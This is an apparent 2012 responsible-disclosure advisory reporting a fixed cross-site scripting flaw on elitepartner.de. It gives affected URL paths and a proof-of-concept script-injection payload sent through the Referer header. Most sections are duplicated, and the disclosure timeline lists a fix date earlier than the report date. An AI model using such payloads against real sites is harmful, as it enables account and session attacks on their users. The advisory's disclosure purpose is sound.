SSCHADV2012-024 - elitepartner.de Cross-site Scripting vulnerability
Advisory:
|
www.elitepartner.de – Cross-site Scripting vulnerability
|
Advisory ID:
|
SSCHADV2012-024
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on www.elitepartner.de
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
http://www.elitepartner.de is prone to a XSS vulnerability
======================
PoC-Exploit
======================
http://www.elitepartner.de/km/gfx/starthomepage/
http://www.elitepartner.de/km/static/js/jquery/
http://www.elitepartner.de/km/gfx/
http://www.elitepartner.de/km/static/
http://www.elitepartner.de/km/js/
http://www.elitepartner.de/km/static/js/omniture/
http://www.elitepartner.de/km/static/js/
Referer: ‘"></style></script><script>alert(/huh/)</script>
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
23-Dec-2012 – informed by contact form
10-Jan-2012 – fixed by developer
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt
PoC-Exploit
======================
http://www.elitepartner.de/km/gfx/starthomepage/
http://www.elitepartner.de/km/static/js/jquery/
http://www.elitepartner.de/km/gfx/
http://www.elitepartner.de/km/static/
http://www.elitepartner.de/km/js/
http://www.elitepartner.de/km/static/js/omniture/
http://www.elitepartner.de/km/static/js/
Referer: ‘"></style></script><script>alert(/huh/)</script>
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
23-Dec-2012 – informed by contact form
10-Jan-2012 – fixed by developer
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt
Comments
Display comments as Linear | Threaded